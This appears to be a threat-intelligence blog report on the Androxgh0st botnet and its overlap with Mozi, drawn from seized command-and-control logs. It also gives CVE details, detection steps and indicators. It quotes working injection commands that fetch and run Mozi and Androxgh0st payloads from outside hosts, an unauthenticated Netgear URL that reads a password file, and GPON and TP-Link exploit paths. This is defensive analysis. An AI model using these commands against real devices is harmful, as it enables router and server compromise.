to the outside world, leaving only a small fraction of working bots standing. During our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi. ANALYSIS * During our routine scans for malicious infrastructure hunting, CloudSEK’s TRIAD found command and control servers being used by the Androxgh0st botnet. Hunting for malicious infrastructure - found misconfigured Logger and Command Sender panels * As we can see, the servers are storing the POST and GET requests from the botnet agent over time. Hunting for malicious infrastructure - found misconfigured Logger and Command Sender panels * Androxgh0st botnet is known to send POST requests containing a number of peculiar strings. Matching Androxgh0st Botnet related strings Now that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of web requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet. VULNERABILITIES EXPLOITED BY ANDROXGH0ST BOTNET CloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access. Affected Product Impact Cisco ASA (up to 8.4.7/9.1.4) Arbitrary web script injection or HTML via an unspecified parameter. Atlassian JIRA (before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.) Allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. Metabase GeoJSON Versions x.40.0-x.40.4 An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables. Sophos Firewall version v18.5 MR3 and older A remote, unauthenticated attacker can execute arbitrary code remotely. Oracle EBS versions 12.2.3 through to 12.2.11 Unauthenticated Arbitrary File Upload OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 Authenticated Remote Code Execution PHP CGI (PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8) Allows an attacker to escape the command line and pass arguments to be interpreted directly by PHP. TP-Link Archer AX21 Allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale. Wordpress Plugin Background Image Cropper v1.2 Remote Code Execution Netgear DGN devices (Netgear DGN1000, firmware version < 1.1.00.48, Netgear DGN2200 v1) Unauthenticated Command Execution with root privileges GPON Home Routers Unauthenticated Command Execution 1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter. Exploitation attempts - CVE-2014-2120 Exploitation attempts - CVE-2014-2120 File Upload Form: * The code initially creates an HTML form that allows a file to be uploaded (<input type='file' name='a'>). * When a file is uploaded, it is saved to the server with its original filename using the PHP function move_uploaded_file(), allowing the attacker to upload arbitrary files to the server. Appends Code to PHP Files: * If the URL contains a bak parameter, a second script is activated. This script looks in the current directory for any files with a .php extension. * For each .php file, it appends the contents of a variable from the POST request ($_POST['file']) to the file. This essentially allows the attacker to insert arbitrary PHP code into any PHP file in the directory. This appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more persistent presence or further backdooring the application. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1. Exploitation attempts - CVE-2021-26086 Metabase GeoJSON map local file inclusion Versions x.40.0-x.40.4(CVE-2021-41277): A local file inclusion vulnerability exists in Metabase due to a security issue present in GeoJSON map support that leads to a local file inclusion vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables. Exploitation attempts - CVE-2021-41277 * Sophos Authentication bypass vulnerability leads to RCE(CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code. Exploitation attempts - CVE-2022-1040 Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, can be exploited in order to gain remote code execution as the oracle user. Exploitation attempts - CVE-2022-21587 OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated): Exploitation attempts - OptiLink Authenticated RCE PHP CGI argument Injection: (CVE-2024-4577): An argument injection issue in PHP-CGI. Exploitation attempts - CVE-2024-4577 TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale. Exploitation attempts - CVE-2023-1389 * The .sh file downloaded using the RCE is what facilitates the exploit. * It downloads files from a remote server, makes them executable, executes them with the argument 'selfrep', and then deletes the downloaded files. This process is repeated for multiple files with different names. * The script downloads and executes files from the remote server at http://154.216.17[.]31. It is evident that it attempts to download and execute executables ('tarm', 'tarm5', 'tarm6', 'tarm7', 'tmips', 'tmpsl', 'tsh4', 'tspc', 'tppc', 'tarc'). The downloaded files are made executable and executed with the argument 'selfrep'. After execution, the downloaded files are deleted. * It uses the command '/bin/busybox' to execute commands. This suggests that the script is likely running on a system with a busybox environment, which confirms the usage against TP-Link routers. GeoServer RCE Vulnerability(CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions. Exploitation attempts - CVE-2024-36401 WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution: Exploitation attempts - WordPress Plugin Background Image Cropper RCE Wordpress Bruteforce Attacks: The botnet cycles through common administrative usernames and uses a consistent password pattern.The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings. Wordpress Bruteforce Attack on Admin Panel Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers:http://<target-ip-address>/setup.cgi?currentsetting.htm=1.Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL: http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1 An attacker can replace the command with the command they want to run. Now, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old vulnerability. We can also see what the injected commands are. Netgear Router Exploitation by Mozi Botnet Injected Commands: cmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear The command sequence is as follows: * rm -rf /tmp/*: This deletes all files in the /tmp directory, to clear any old data and ensure enough storage for the downloaded malware. * wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear: This uses wget to download a malicious file named Mozi.m from an external server (200.124.241[.]140:44999) and saves it as /tmp/netgear. * sh netgear: This runs the downloaded file as a shell script. Mozi.m likely contains malicious code. Once executed, the target device becomes part of the botnet. The downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to a network of compromised devices. Unauthenticated Command Execution on GPON routers(CVE-2018-10561, CVE-2018-10562): CVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically require login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access. CVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed by revisiting /diag.html, allowing commands to be executed and their output retrieved. GPON Router Exploitation by Mozi Botnet Possibilities: Mozi Payload as a Component of Androxgh0st: * It’s possible that Androxgh0st has fully integrated Mozi’s payload as a module within its own botnet architecture. In this case, Androxgh0st is not just collaborating with Mozi but embedding Mozi’s specific functionalities (e.g., IoT infection & propagation mechanisms) into its standard set of operations. * This would mean that Androxgh0st has expanded to leverage Mozi’s propagation power to infect more IoT devices, using Mozi’s payloads to accomplish goals that otherwise would require separate infection routines. Unified Command Infrastructure: * If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both Androxgh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations. TRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi Botnet. Similarities in TTPs: TTP Example - Mozi Example - Androxgh0st Command Injection and same paths /setup.cgi?cmd=wget+http://[attacker_url]/Mozi.m+-O+/tmp/netgear;sh+netgear /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx File Inclusion /admin.cgi?file=../../../../../etc/passwd /config.cgi?file=../../../../../etc/shadow Exploitation of Admin Panels using bruteforce POST /login.cgi log=admin&pwd=admin123 POST /wp-login.php log=admin&pwd=Passnext%40123456 Payload Download and Execution wget http://[attacker_url]/mozi_arm; chmod +x mozi_arm; ./mozi_arm & curl http://[attacker_url]/androx_arm -o /tmp/androx_arm; chmod +x /tmp/androx_arm; /tmp/androx_arm Both botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs. GLOBAL INFECTION STATISTICS The number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over 500 devices have been infected. Bots by country CHECK FOR SIGNS OF COMPROMISE 1. REVIEW HTTP AND WEB SERVER LOGS * Check for Suspicious Requests: Look for HTTP GET or POST requests that include unusual or suspicious commands, such as wget, curl, or command injection parameters like cmd=rm or cmd=wget. These are common signs of attempted command injection by Androxgh0st. Example log entries to watch for: GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx POST /wp-login.php HTTP/1.1 log=admin&pwd=Passnext%40123456 * Check for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity on login pages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak passwords . 2. MONITOR SYSTEM PROCESSES FOR UNEXPECTED ACTIVITY * Identify Suspicious Processes: Use commands like ps aux or top to look for unexpected processes running from unusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads. Androxgh0st may execute commands such as: /tmp/androx * Inspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files or startup scripts. Use the following commands to check for any suspicious entries: crontab -l cat /etc/rc.local cat /etc/cron.d/* 3. EXAMINE SUSPICIOUS FILES IN TEMPORARY DIRECTORIES * Inspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and executed from these directories. Look for files with unusual names or recent changes in these locations: ls -la /tmp ls -la /var/tmp * Check File Permissions and Executable Files: Files in these directories should not typically be executable. Use find to locate executable files in these directories: find /tmp -type f -perm /111 4. ANALYZE NETWORK CONNECTIONS AND TRAFFIC * Monitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to its command-and-control (C2) server. Use tools like netstat or ss to identify active network connections: netstat -antp | grep ESTABLISHED * Look for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you don’t recognize. * Check for Excessive or Unusual Traffic Patterns: Androxgh0st-infected devices may exhibit unusual traffic, particularly if they are participating in a botnet. Monitor traffic for signs of:some text * Repeated DNS lookups for suspicious domains. * High volumes of outbound traffic that may indicate participation in DDoS activities. 5. REVIEW SECURITY CONFIGURATIONS FOR CHANGES * Check for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional ports or modify firewall rules. Review firewall rules and router settings for unexpected modifications. * Inspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to gain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys. Check: cat ~/.ssh/authorized_keys 6. SCAN FOR KNOWN VULNERABILITIES AND APPLY PATCHES * Identify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers, routers, and IoT devices. Use continuous attack surface scanners to detect any unpatched services or applications. * Update Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are running the latest firmware versions, as Androxgh0st targets unpatched CVEs. 7. USE ENDPOINT DETECTION TOOLS * Run Endpoint Detection and Response (EDR) Software: EDR tools can help identify unusual behaviors, unauthorized processes, and suspicious files that may indicate Androxgh0st infection. * Conduct a File Integrity Check: Use tools that can detect changes to critical system files, startup configurations, or web server files. 8. CHECK LOGS FOR SIGNS OF PERSISTENCE MECHANISMS * Look for Modified Configuration Files: Review configuration files for any injected commands that would re-enable the botnet upon reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts. * Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts. THREAT ACTOR ACTIVITY AND RATING Threat Actor Profiling Active since January 2024 Reputation HIGH Current Status ACTIVE History Androxgh0st remains actively deployed in the wild, even after the Mozi killswitch activation. It scans for vulnerable infrastructure, and has now expanded its targets from just Laravel and Apache servers, to a wide technology stack including but not limited to network gateway devices and WordPress. * Known for exploiting well-documented vulnerabilities (e.g., CVE-2017-9841 in PHPUnit and CVE-2021-41773 in Apache HTTP Server) to establish control over web servers. * Uses a botnet for systematic exploitation, scanning, and persistent access via file uploads and backdoors. * Has exploited a wide range of vulnerabilities across different software (e.g., Jira, Metabase, Sophos) to expand its control and facilitate remote code execution (RCE). Rating HIGH REFERENCES * *Intelligence source and information reliability - Wikipedia * #Traffic Light Protocol - Wikipedia * Other sources APPENDIX INDICATORS Request Logger and Command Sender - Androxgh0st * 165.22.184[.]66 * 45.55.104[.]59 * Api[.]next[.]eventsrealm[.]com (Eventsrealm is a Jamaica-based events aggregator platform) TP Link Router Exploitation - Download servers * 45.202.35[.]24 * 154.216.17[.]31 Netgear Router Exploitation - Download server * 200.124.241[.]140 GPON Router Exploitation - Download server * 117.215.206[.]216 File Hashes - Androxgh0st TP-Link Exploitation (md5) * 2403a89ab4ffec6d864ac0a7a225e99a * d9553ca3d837f261f8dfda9950978a0a * c8340927faaf9dccabb84a849f448e92 * a2021755d4d55c39ada0b4abc0c8bcf5 * c8340927faaf9dccabb84a849f448e92 * db2a59a1fd789d62858dfc4f436822d7 * dd5e7a153bebb8270cf0e7ce53e05d9c * f75061ac31f8b67ddcd5644f9570e29b * 45b5c4bff7499603a37d5a665b5b4ca3 * 6f8a79918c78280aec401778564e3345 * e3e6926fdee074adaa48b4627644fccb * abab0da6685a8eb739027aee4a5c4eaa * 2938986310675fa79e01af965f4ace4f * a6609478016c84aa235cd8b3047223eb * 3cb30d37cdfe949ac1ff3e33705f09e3 * 0564f83ada149b63a8928ff7591389f3 * 3d48dfd97f2b77417410500606b2ced6